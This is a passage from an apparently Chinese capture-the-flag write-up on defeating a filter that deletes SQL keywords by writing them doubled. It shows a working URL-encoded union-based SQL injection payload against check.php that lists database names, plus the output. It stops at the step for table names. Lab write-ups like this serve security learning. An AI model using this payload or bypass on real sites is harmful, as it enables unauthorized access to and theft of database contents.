题目要点
- 双写绕过:waf将关键字替换为空。
题目内容
解题
1.查询数据库
/check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata%20%23
结果
Hello 2!
Your password is ‘information_schema,mysql,performance_schema,test,ctf,geek’
2.查询表名
/check.php?username